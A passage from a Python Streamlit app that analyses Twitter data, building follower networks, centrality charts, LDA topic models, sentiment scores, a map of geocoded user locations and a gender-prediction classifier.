'not_followed_back' nodes and edges\r\n not_followed_back = set(followers[account]) - set(following[account])\r\n for not_followed in not_followed_back:\r\n G.add_node(not_followed, title=not_followed, label=not_followed)\r\n G.add_edge(not_followed, account, relationship='not_followed_back')\r\n\r\n # Add 'not_following_back' nodes and edges\r\n not_following_back = set(following[account]) - set(followers[account])\r\n for not_following in not_following_back:\r\n G.add_node(not_following, title=not_following, label=not_following)\r\n G.add_edge(account, not_following, relationship='not_following_back')\r\n\r\n return G\r\n \r\n\r\n def visualize_social_network(G, selected_accounts):\r\n subgraph_nodes = set()\r\n for account in selected_accounts:\r\n subgraph_nodes |= set([account] + followers[account] + following[account])\r\n subgraph = G.subgraph(subgraph_nodes)\r\n\r\n nt = net(height='750px', width='100%', bgcolor='#fff', font_color='#3C486B', directed=True)\r\n\r\n node_colors = {}\r\n for account in selected_accounts:\r\n node_colors[account] = '#2CD3E1'\r\n for follower in followers[account]:\r\n node_colors[follower] = '#FF6969'\r\n for followee in following[account]:\r\n node_colors[followee] = '#FFD3B0'\r\n\r\n # Add node colors for 'not_following_back'\r\n not_following_back = set(following[account]) - set(followers[account])\r\n for not_following in not_following_back:\r\n node_colors[not_following] = '#F5AEC1'\r\n\r\n # Add node colors for 'not_followed_back'\r\n not_followed_back = set(followers[account]) - set(following[account])\r\n for not_followed in not_followed_back:\r\n node_colors[not_followed] = '#FFA500'\r\n\r\n for node in subgraph.nodes():\r\n nt.add_node(node, title=node, label=node, color=node_colors.get(node, 'skyblue'))\r\n\r\n for edge in subgraph.edges():\r\n nt.add_edge(edge[0], edge[1])\r\n\r\n nt.font_color = 'white'\r\n \r\n nt.save_graph('html_files/social_network.html')\r\n\r\n # Display the network visualization in Streamlit\r\n with open('html_files/social_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Read the data\r\n followers, following, tweet_data = get_followers_following_tweets(folder_path)\r\n\r\n # Build the social network\r\n G = build_social_network(followers, following)\r\n\r\n default_accounts = list(followers.keys())[:4]\r\n\r\n # Ask the user which accounts to visualize using st.sidebar.multiselect\r\n selected_accounts = st.multiselect('Select accounts to visualize', list(followers.keys()), default=default_accounts)\r\n\r\n # Retrieve the account names instead of file names\r\n account_names = [account.split('_')[0] for account in selected_accounts]\r\n\r\n # Display the selected account names in the Streamlit header\r\n st.header(\"Social Network Accounts' Followers and Friends: \" + ', '.join(account_names))\r\n # Visualize the selected accounts\r\n visualize_social_network(G, selected_accounts) \r\n \r\n st.markdown(\"---\")\r\n ##############################################################################\r\n ############################################################################ \r\n \r\nwith tab2:\r\n st.header('Issue Analysis')\r\n\r\n folder_path = \"twitkeys\"\r\n\r\n files = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')]\r\n df = None\r\n\r\n if files:\r\n data = []\r\n for file in files:\r\n keyword = os.path.splitext(os.path.basename(file))[0]\r\n with open(file, 'r') as f:\r\n file_data = json.load(f)\r\n for tweet_data in file_data['data']:\r\n tweet = tweet_data['Text']\r\n created_at = pd.to_datetime(tweet_data['Created At'])\r\n data.append({\r\n 'keyword': keyword,\r\n 'text': tweet,\r\n 'date': created_at\r\n })\r\n df = pd.DataFrame(data)\r\n\r\n # Create a list of available keywords\r\n if df is not None:\r\n keywords = list(df['keyword'].unique())\r\n else:\r\n keywords = []\r\n\r\n # Set the default selected keywords to the first 4 keywords\r\n default_keywords = keywords[:4]\r\n\r\n # Set the default time range to one month from the current date\r\n end_date = pd.to_datetime(datetime.today().date())\r\n start_date = end_date - timedelta(days=30)\r\n\r\n # Create widgets for selecting the keywords and time range\r\n selected_keywords = st.multiselect('Select keywords to compare', keywords, default=default_keywords, key='selissue')\r\n cols_ta, cols_tb = st.columns([1, 1])\r\n start_date = pd.to_datetime(cols_ta.date_input('Start date', value=start_date, key='start_date')).date()\r\n end_date = pd.to_datetime(cols_tb.date_input('End date', value=end_date, key='end_date')).date()\r\n\r\n # Filter the data based on the selected keywords and time range\r\n if df is not None:\r\n mask = (df['keyword'].isin(selected_keywords)) & (df['date'].dt.date >= start_date) & (df['date'].dt.date <= end_date)\r\n df_filtered = df.loc[mask]\r\n else:\r\n df_filtered = pd.DataFrame()\r\n\r\n if len(df_filtered) > 0:\r\n df_grouped = df_filtered.groupby(['date', 'keyword']).size().reset_index(name='count')\r\n fig, ax = plt.subplots(figsize=(10, 6))\r\n sns.lineplot(data=df_grouped, x='date', y='count', hue='keyword', ax=ax)\r\n ax.set_title(f\"Tweets per Day for {', '.join(selected_keywords)}\")\r\n ax.set_xlabel(\"Date\")\r\n ax.set_ylabel(\"Number of Tweets\")\r\n st.pyplot(fig)\r\n else:\r\n st.write(\"No data available for the selected time range and keywords.\")\r\n\r\n \r\n ################ SNA ####################\r\n import glob\r\n\r\n\r\n def process_json_files(files):\r\n G = nx.DiGraph()\r\n \r\n for file in files:\r\n with open(file, 'r') as f:\r\n file_data = json.load(f)\r\n for tweet_data in file_data['data']:\r\n user_screen_name = tweet_data['User Screen Name']\r\n mentioned_users = [user['User Screen Name'] for user in tweet_data['mentioned_users']]\r\n retweeted_user = tweet_data['Retweeted Tweet']['Author Screen Name'] if 'Retweeted Tweet' in tweet_data else None\r\n hashtags = tweet_data['Hashtags']\r\n \r\n G.add_node(user_screen_name)\r\n if retweeted_user:\r\n G.add_node(retweeted_user)\r\n G.add_edge(user_screen_name, retweeted_user, relationship='retweeted')\r\n for mentioned_user in mentioned_users:\r\n G.add_node(mentioned_user)\r\n G.add_edge(user_screen_name, mentioned_user, relationship='mentioned')\r\n\r\n for hashtag in hashtags:\r\n # Connect users who have mentioned or used the same hashtag\r\n users_with_same_hashtag = [node for node in G.nodes if G.nodes[node].get('relationship') == 'mentioned' and hashtag in G.edges[user_screen_name, node]['relationship']]\r\n for user in users_with_same_hashtag:\r\n G.add_edge(user_screen_name, user, relationship=hashtag)\r\n \r\n return G\r\n\r\n # Read JSON files from the folder\r\n folder_path = \"twitkeys\"\r\n file_path = os.path.join(\"twitkeys\", f\"{keyword}.json\")\r\n # files = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')]\r\n # files = [os.path.splitext(os.path.basename(file))[0] for file in glob.glob(os.path.join(folder_path, '*.json'))]\r\n\r\n # Create the social network graph\r\n G = process_json_files(files)\r\n\r\n # Function to visualize the social network using pyvis\r\n def visualize_social_network(G):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n for node in G.nodes:\r\n nt.add_node(node, label=node)\r\n\r\n for edge in G.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = G.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/issue_social_network.html')\r\n\r\n # Display the graph in Streamlit\r\n with open('html_files/issue_social_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n default_files = [os.path.splitext(os.path.basename(file))[0] for file in files[:4]] if len(files) >= 4 else [os.path.splitext(os.path.basename(file))[0] for file in files]\r\n selected_files = st.multiselect('Select Issue/Topic', [os.path.splitext(os.path.basename(file))[0] for file in files], default=default_files, format_func=lambda x: f\"{x}.json\")\r\n\r\n # Process the selected JSON files and build the social network graph\r\n selected_files_paths = [os.path.join(folder_path, f\"{file}.json\") for file in selected_files]\r\n selected_G = process_json_files(selected_files_paths)\r\n\r\n # Visualize the social network\r\n # visualize_social_network(selected_G)\r\n\r\n ####################DEGREE CENTRALITY###########################\r\n # Calculate degree centrality\r\n degree_centrality = nx.degree_centrality(selected_G)\r\n\r\n # Create a subgraph with nodes having non-zero degree centrality\r\n degree_subgraph = selected_G.subgraph([node for node, centrality in degree_centrality.items() if centrality > 0])\r\n\r\n # Function to visualize the degree centrality network and top actors using Pyvis and matplotlib\r\n def visualize_degree_centrality_network(subgraph, centrality_values):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n # Add nodes to the network with size based on degree centrality\r\n for node in subgraph.nodes:\r\n centrality = centrality_values[node]\r\n node_size = centrality * 20 # Adjust the scaling factor as needed\r\n nt.add_node(node, label=node, size=node_size)\r\n\r\n # Add edges to the network\r\n for edge in subgraph.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = subgraph.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/degree_centrality_network.html')\r\n\r\n \r\n\r\n with open('html_files/degree_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Calculate and plot the top actors based on degree centrality\r\n top_actors = sorted(centrality_values, key=centrality_values.get, reverse=True)[:5]\r\n centrality_scores = [centrality_values[actor] for actor in top_actors]\r\n\r\n y_pos = np.arange(len(top_actors))\r\n\r\n fig, ax = plt.subplots()\r\n ax.barh(y_pos, centrality_scores)\r\n ax.set_xlabel('Degree Centrality')\r\n ax.set_ylabel('Top Actors')\r\n ax.set_title('Top Main Actors')\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(top_actors)\r\n plt.tight_layout()\r\n\r\n # Display the plot in Streamlit\r\n st.pyplot(fig)\r\n\r\n\r\n################## BETWEENESS CENTRALITY ##########################\r\n # Calculate betweenness centrality\r\n betweenness_centrality = nx.betweenness_centrality(selected_G)\r\n\r\n # Create a subgraph with nodes having non-zero betweenness centrality\r\n betweenness_subgraph = selected_G.subgraph([node for node, centrality in betweenness_centrality.items() if centrality > 0])\r\n\r\n\r\n\r\n # Function to visualize the betweenness centrality network and top actors using Pyvis and matplotlib\r\n def visualize_betweenness_centrality_network(subgraph, centrality_values):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n # Add nodes to the network with size based on betweenness centrality\r\n for node in subgraph.nodes:\r\n centrality = centrality_values[node]\r\n node_size = centrality * 20 # Adjust the scaling factor as needed\r\n nt.add_node(node, label=node, size=node_size)\r\n\r\n # Add edges to the network\r\n for edge in subgraph.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = subgraph.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/betweenness_centrality_network.html')\r\n\r\n \r\n with open('html_files/betweenness_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n # Calculate and plot the top actors based on betweenness centrality\r\n top_actors = sorted(centrality_values, key=centrality_values.get, reverse=True)[:5]\r\n centrality_scores = [centrality_values[actor] for actor in top_actors]\r\n\r\n y_pos = np.arange(len(top_actors))\r\n\r\n fig, ax = plt.subplots()\r\n ax.barh(y_pos, centrality_scores)\r\n ax.set_xlabel('Betweenness Centrality')\r\n ax.set_ylabel('Actors')\r\n ax.set_title('Top Actors based on Betweenness Centrality')\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(top_actors)\r\n plt.tight_layout()\r\n\r\n # Display the plot in Streamlit\r\n st.pyplot(fig)\r\n##################################################################\r\n def calculate_closeness_centrality(G):\r\n closeness_centrality = nx.closeness_centrality(G)\r\n\r\n return closeness_centrality\r\n \r\n # Calculate closeness centrality\r\n closeness_centrality = calculate_closeness_centrality(selected_G)\r\n\r\n # Sort the centrality values in descending order\r\n sorted_centrality = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\r\n\r\n # Extract the top nodes and their centrality values\r\n top_nodes = [node for node, centrality in sorted_centrality[:10]]\r\n top_centrality = [centrality for node, centrality in sorted_centrality[:10]]\r\n # Function to visualize the closeness centrality network using Pyvis\r\n def visualize_closeness_centrality_network(G, centrality_values):\r\n nt = net(height='750px', width='100%', bgcolor='#ffffff', font_color='#333333', directed=True)\r\n\r\n # Add nodes to the network with size based on closeness centrality\r\n for node in G.nodes:\r\n centrality = centrality_values[node]\r\n node_size = centrality * 20 # Adjust the scaling factor as needed\r\n nt.add_node(node, label=node, size=node_size)\r\n\r\n # Add edges to the network\r\n for edge in G.edges:\r\n source = edge[0]\r\n target = edge[1]\r\n relationship = G.edges[edge]['relationship']\r\n nt.add_edge(source, target, label=relationship)\r\n\r\n nt.save_graph('html_files/closeness_centrality_network.html')\r\n with open('html_files/closeness_centrality_network.html', 'r') as f:\r\n html_string = f.read()\r\n st.components.v1.html(html_string, height=960, scrolling=True)\r\n\r\n plt.figure(figsize=(10, 6))\r\n plt.bar(top_nodes, top_centrality)\r\n plt.xlabel('Nodes')\r\n plt.ylabel('Closeness Centrality')\r\n plt.title('Top Actors Based on Closeness Centrality')\r\n plt.xticks(rotation=90)\r\n plt.tight_layout()\r\n\r\n # Display the chart in Streamlit\r\n st.pyplot(plt)\r\n\r\n\r\n\r\n\r\n############################VISUGRAPJH###########################\r\n colviz1, colviz2, colviz3, colviz4=st.tabs(['Social Network','Main Actors', 'Bridging Actors', 'Supporting Actors'])\r\n with colviz1:\r\n visualize_social_network(selected_G)\r\n \r\n with colviz2:\r\n visualize_degree_centrality_network(degree_subgraph, degree_centrality)\r\n\r\n with colviz3:\r\n visualize_betweenness_centrality_network(betweenness_subgraph, betweenness_centrality)\r\n \r\n with colviz4:\r\n visualize_closeness_centrality_network(selected_G, closeness_centrality)\r\n \r\n#################################################################################\r\n######################TOPIC MODELING#############################################\r\n\r\n\r\n\r\n # Function to load and preprocess the text data\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n \r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform lemmatization\r\n processed_tokens = [lemmatizer.lemmatize(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens to the preprocessed text data\r\n preprocessed_text_data.append(processed_tokens)\r\n \r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n # Function to perform topic modeling\r\n def perform_topic_modeling(text_data):\r\n # Create a dictionary from the text data\r\n dictionary = gensim.corpora.Dictionary(text_data)\r\n \r\n # Create a corpus (Bag of Words representation)\r\n corpus = [dictionary.doc2bow(text) for text in text_data]\r\n \r\n # Perform topic modeling using LDA\r\n lda_model = gensim.models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=10, passes=10)\r\n \r\n # Return the LDA model\r\n return lda_model\r\n\r\n \r\n\r\n # Main Streamlit app\r\n st.title(\"Topic Modeling with pyLDAvis\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, default=file_list[:1])\r\n\r\n\r\n # List to store preprocessed text data from selected files\r\n preprocessed_text_data = []\r\n\r\n # Iterate over the selected files\r\n for file_name in selected_files:\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n\r\n # Perform topic modeling on the preprocessed text data\r\n lda_model = perform_topic_modeling(preprocessed_text_data)\r\n\r\n dictionary = gensim.corpora.Dictionary(preprocessed_text_data)\r\n corpus = [dictionary.doc2bow(text) for text in preprocessed_text_data]\r\n\r\n # Generate the pyLDAvis visualization\r\n lda_display = pyLDAvis.gensim.prepare(lda_model, corpus, dictionary, sort_topics=False)\r\n\r\n # Save the HTML file\r\n pyLDAvis.save_html(lda_display, \"lda.html\")\r\n\r\n # Read the HTML file\r\n with open(\"lda.html\", \"r\") as f:\r\n html_string = f.read()\r\n\r\n # Display the HTML file in Streamlit\r\n st.components.v1.html(html_string, height=800, width=1500, scrolling=False)\r\n\r\n\r\n################################ SENTIMENT ANALYSIS#################################\r\n\r\n from nltk.sentiment import SentimentIntensityAnalyzer\r\n import numpy as np\r\n\r\n from Sastrawi.Stemmer.StemmerFactory import StemmerFactory\r\n\r\n\r\n # Function to load and preprocess the text data\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n\r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n stemmer = StemmerFactory().create_stemmer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform stemming\r\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens to the preprocessed text data\r\n preprocessed_text_data.append(processed_tokens)\r\n\r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n\r\n # Function to perform sentiment analysis using VADER\r\n def perform_sentiment_analysis(text_data):\r\n # Initialize the VADER sentiment intensity analyzer\r\n sia = SentimentIntensityAnalyzer()\r\n\r\n # Perform sentiment analysis on each text\r\n sentiment_scores = []\r\n for text in text_data:\r\n sentiment_score = sia.polarity_scores(' '.join(text))\r\n sentiment_scores.append(sentiment_score)\r\n\r\n # Convert the sentiment scores to a DataFrame\r\n df_sentiment = pd.DataFrame(sentiment_scores)\r\n\r\n # Return the DataFrame with sentiment scores\r\n return df_sentiment\r\n\r\n\r\n # Main Streamlit app\r\n st.title(\"Sentiment Analysis\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, default=file_list[:4], key=\"file_selector\")\r\n\r\n # Define the number of columns based on the number of selected files\r\n num_columns = len(selected_files)\r\n\r\n # Create a grid layout with the specified number of columns\r\n columns = st.columns(num_columns)\r\n\r\n # Iterate over the selected files and display sentiment analysis results and charts\r\n for i, file_name in enumerate(selected_files):\r\n # List to store preprocessed text data from the current file\r\n preprocessed_text_data = []\r\n\r\n # File path of the current file\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n # Perform sentiment analysis on the preprocessed text data\r\n df_sentiment = perform_sentiment_analysis(preprocessed_text_data)\r\n\r\n # Calculate the sentiment distribution for the current file\r\n sentiment_distribution = df_sentiment.mean().drop(\"compound\")\r\n\r\n # Display the sentiment analysis results in the current column\r\n with columns[i]:\r\n st.subheader(f\"Sentiment Analysis: {file_name}\")\r\n st.dataframe(df_sentiment)\r\n\r\n # Plot the sentiment distribution as a pie chart\r\n fig, ax = plt.subplots()\r\n ax.pie(sentiment_distribution.values, labels=sentiment_distribution.index, autopct='%1.1f%%', startangle=90)\r\n ax.axis('equal')\r\n ax.set_title(f\"Sentiment Distribution: {file_name}\")\r\n\r\n # Display the chart\r\n st.pyplot(fig)\r\n\r\n\r\n################################# SENTIMENT ANALYSIS PER USER PER FILES ##############################\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n\r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n stemmer = StemmerFactory().create_stemmer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n user = tweet_data['User Name'] # Get the user name\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform stemming\r\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens and the user to the preprocessed text data\r\n preprocessed_text_data.append((processed_tokens, user))\r\n\r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n # Perform sentiment analysis per user\r\n def perform_sentiment_analysis_per_user(text_data):\r\n # Initialize the VADER sentiment intensity analyzer\r\n sia = SentimentIntensityAnalyzer()\r\n\r\n # Create a dictionary to store sentiment scores per user\r\n user_sentiment_scores = {}\r\n\r\n # Perform sentiment analysis on each text per user\r\n for text, user in text_data:\r\n sentiment_score = sia.polarity_scores(' '.join(text))\r\n\r\n # Add the sentiment score to the user's scores\r\n if user not in user_sentiment_scores:\r\n user_sentiment_scores[user] = {\r\n 'positive': [],\r\n 'negative': [],\r\n 'neutral': [],\r\n 'compound': []\r\n }\r\n\r\n user_sentiment_scores[user]['positive'].append(sentiment_score['pos'])\r\n user_sentiment_scores[user]['negative'].append(sentiment_score['neg'])\r\n user_sentiment_scores[user]['neutral'].append(sentiment_score['neu'])\r\n user_sentiment_scores[user]['compound'].append(sentiment_score['compound'])\r\n\r\n # Calculate the average sentiment scores per user\r\n user_sentiment_scores_avg = {}\r\n for user, scores in user_sentiment_scores.items():\r\n user_sentiment_scores_avg[user] = {\r\n 'positive': np.mean(scores['positive']),\r\n 'negative': np.mean(scores['negative']),\r\n 'neutral': np.mean(scores['neutral']),\r\n 'compound': np.mean(scores['compound'])\r\n }\r\n\r\n # Convert the sentiment scores to a DataFrame\r\n df_sentiment_per_user = pd.DataFrame.from_dict(user_sentiment_scores_avg, orient='index')\r\n\r\n # Return the DataFrame with sentiment scores per user\r\n return df_sentiment_per_user\r\n\r\n # Main Streamlit app\r\n st.title(\"Sentiment Analysis per user\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, default=file_list[:1], key=\"file_selector_sent\")\r\n\r\n # Iterate over the selected files\r\n for file_name in selected_files:\r\n # List to store preprocessed text data from the current file\r\n preprocessed_text_data = []\r\n\r\n # File path of the current file\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n # Perform sentiment analysis per user on the preprocessed text data\r\n df_sentiment_per_user = perform_sentiment_analysis_per_user(preprocessed_text_data)\r\n\r\n # Display the sentiment analysis results per user\r\n st.subheader(f\"Sentiment Analysis per User: {file_name}\")\r\n st.dataframe(df_sentiment_per_user)\r\n\r\n # Plot the sentiment scores per user as a bar chart\r\n ax = df_sentiment_per_user.plot(kind='bar', rot=0)\r\n plt.xlabel('User')\r\n plt.ylabel('Sentiment Score')\r\n plt.title(f\"Sentiment Analysis per User: {file_name}\")\r\n plt.xticks(rotation='vertical')\r\n plt.tight_layout()\r\n\r\n # Modify the text of user in the bar chart\r\n for p in ax.patches:\r\n ax.annotate(str(round(p.get_height(), 2)), (p.get_x() + p.get_width() / 2., p.get_height()),\r\n ha='center', va='center', xytext=(0, 5), textcoords='offset points', fontsize=5)\r\n\r\n st.pyplot(plt)\r\n \r\n\r\n######################### LOCATION ##############################\r\n\r\n \r\n import folium\r\n from streamlit_folium import folium_static, st_folium\r\n from geopy.geocoders import Nominatim\r\n from geopy.exc import GeocoderUnavailable\r\n import os\r\n \r\n \r\n # Create a geolocator object\r\n geolocator = Nominatim(user_agent='twitter_map_app')\r\n\r\n # Define a function to perform geocoding with caching\r\n @st.cache_data\r\n def geocode_location(location):\r\n try:\r\n location_data = geolocator.geocode(location, timeout=5) # Increase the timeout value as needed\r\n if location_data:\r\n return location_data.latitude, location_data.longitude\r\n except GeocoderUnavailable:\r\n st.warning(f\"Geocoding service is unavailable for location: {location}\")\r\n return None, None\r\n \r\n \r\n\r\n # Get the file paths of all JSON files in the \"twitkeys\" folder\r\n file_paths = glob.glob('twitkeys/*.json')\r\n\r\n # Sort the file paths by modification time (newest to oldest)\r\n file_paths.sort(key=os.path.getmtime, reverse=True)\r\n\r\n # Select the four newest files\r\n default_files = file_paths[:1]\r\n\r\n # Allow users to select multiple files using a multiselect widget\r\n selected_files = st.multiselect(\"Select JSON Files\", file_paths, default=default_files)\r\n\r\n for file_path in selected_files:\r\n file_name = os.path.splitext(os.path.basename(file_path))[0] # Extract the filename without extension\r\n\r\n # Define variables to store the min/max latitude and longitude\r\n min_latitude = float('inf')\r\n max_latitude = float('-inf')\r\n min_longitude = float('inf')\r\n max_longitude = float('-inf')\r\n\r\n # Iterate over the selected files\r\n for file_path in selected_files:\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n\r\n user_data = data['data']\r\n\r\n # Perform geocoding for each user location\r\n for user in user_data:\r\n location = user.get('User Location')\r\n if location:\r\n latitude, longitude = geocode_location(location)\r\n user['Latitude'] = latitude\r\n user['Longitude'] = longitude\r\n time.sleep(1) # Add a 1-second delay between requests\r\n\r\n # Update the min/max latitude and longitude\r\n if latitude is not None:\r\n min_latitude = min(min_latitude, latitude)\r\n max_latitude = max(max_latitude, latitude)\r\n if longitude is not None:\r\n min_longitude = min(min_longitude, longitude)\r\n max_longitude = max(max_longitude, longitude)\r\n\r\n # Calculate the center latitude and longitude\r\n center_latitude = (min_latitude + max_latitude) / 2\r\n center_longitude = (min_longitude + max_longitude) / 2\r\n\r\n # Create a Folium map object\r\n m = folium.Map(location=[center_latitude, center_longitude], zoom_start=2)\r\n\r\n # Add markers to the map\r\n for user in user_data:\r\n latitude = user.get('Latitude')\r\n longitude = user.get('Longitude')\r\n user_name = user.get('User Name')\r\n\r\n if latitude is not None and longitude is not None:\r\n popup = f\"User: {user_name}\\nLocation: {user['User Location']}\"\r\n folium.Marker([latitude, longitude], popup=popup, tooltip=user_name).add_to(m)\r\n\r\n # Display the map for the current file\r\n st.header(f\"User Map in The Conversation on {file_name}\")\r\n st_folium(m, width=1500, height=600)\r\n\r\n#################################################################\r\n from sklearn.model_selection import train_test_split\r\n from sklearn.feature_extraction.text import CountVectorizer\r\n from sklearn.preprocessing import LabelEncoder\r\n from sklearn.metrics import classification_report\r\n from sklearn.ensemble import GradientBoostingClassifier\r\n from sklearn.ensemble import GradientBoostingClassifier\r\n import joblib\r\n from sklearn.metrics import accuracy_score\r\n import plotly.express as px\r\n \r\n import numpy as np\r\n\r\n st.title(\"Gender Prediction from Twitter Data\")\r\n st.header(\"Predicted Gender\")\r\n \r\n def preprocess_tweet(tweet, training_columns):\r\n processed_tweet = {\r\n 'User Name': str(tweet[0]),\r\n 'User Description': str(tweet[1]).lower() if tweet[1] else '',\r\n 'Text': str(tweet[2]).lower(),\r\n }\r\n\r\n processed_tweet = {k: float(v) if isinstance(v, str) and v.isnumeric() else v for k, v in processed_tweet.items()}\r\n processed_tweet = pd.DataFrame(processed_tweet, index=[0])\r\n\r\n # Perform one-hot encoding on the categorical variables\r\n processed_tweet_encoded = pd.get_dummies(processed_tweet)\r\n processed_tweet_encoded = processed_tweet_encoded.reindex(columns=training_columns, fill_value=0)\r\n\r\n return processed_tweet_encoded.values.flatten()\r\n\r\n \r\n def predict_gender(model, features, training_columns):\r\n processed_tweet = preprocess_tweet(features, training_columns)\r\n prediction = model.predict([processed_tweet])\r\n return prediction[0]\r\n\r\n\r\n\r\n dfout = pd.read_json('output1.json')\r\n\r\n # st.dataframe(dfout)\r\n # print (\"DFOUT:\",dfout)\r\n\r\n # Prepare the data\r\n if 'Gender' in dfout.columns:\r\n X = dfout.drop('Gender', axis=1)\r\n else:\r\n X = dfout.copy()\r\n\r\n if 'Gender' in dfout.columns:\r\n y = dfout['Gender']\r\n else:\r\n # Handle the case when 'Gender' column is missing\r\n # For example, you can print an error message or take appropriate action\r\n st.write('Gender not in df.columns')\r\n\r\n # Perform one-hot encoding on the categorical variables in X\r\n X_encoded = pd.get_dummies(X)\r\n\r\n # Get the training columns from the X_encoded DataFrame\r\n training_columns = X_encoded.columns\r\n\r\n # Split the data into training and testing sets\r\n X_train, X_test, y_train, y_test = train_test_split(X_encoded, y, test_size=0.2, random_state=42)\r\n\r\n # Create a Gradient Boosting Classifier model\r\n model = GradientBoostingClassifier()\r\n\r\n # Fit the model to the training data\r\n model.fit(X_train, y_train)\r\n\r\n # Predict the gender for the test data\r\n y_pred = model.predict(X_test)\r\n\r\n # Evaluate the model's performance\r\n accuracy = accuracy_score(y_test, y_pred)\r\n st.write('Accuracy:', accuracy)\r\n\r\n # Save the trained model to a file\r\n joblib.dump(model, 'modelgend.pkl')\r\n\r\n # Get the file paths of all JSON files in the \"twitkeys\" folder\r\n file_paths = glob.glob('twitkeys/*.json')\r\n\r\n # Sort the file paths by modification time (newest to oldest)\r\n file_paths.sort(key=os.path.getmtime, reverse=True)\r\n\r\n # Allow users to select multiple files using a multiselect widget\r\n \r\n selected_files = st.multiselect(\"Select JSON Files\", file_paths, default=file_paths[:4], key='gensel')\r\n\r\n data_list = []\r\n\r\n # Define the number of columns based on the number of selected files\r\n num_columns = len(selected_files)\r\n\r\n # Create a grid layout with the specified number of columns\r\n columns = st.columns(num_columns)\r\n\r\n for i, file_path in enumerate(selected_files):\r\n with open(file_path, 'r') as file:\r\n json_data = json.load(file)\r\n data_list.extend(json_data[\"data\"])\r\n\r\n dfgend = pd.DataFrame(data_list)\r\n # Drop irrelevant columns\r\n columns_to_drop = [\"User Screen Name\", \"User Location\", 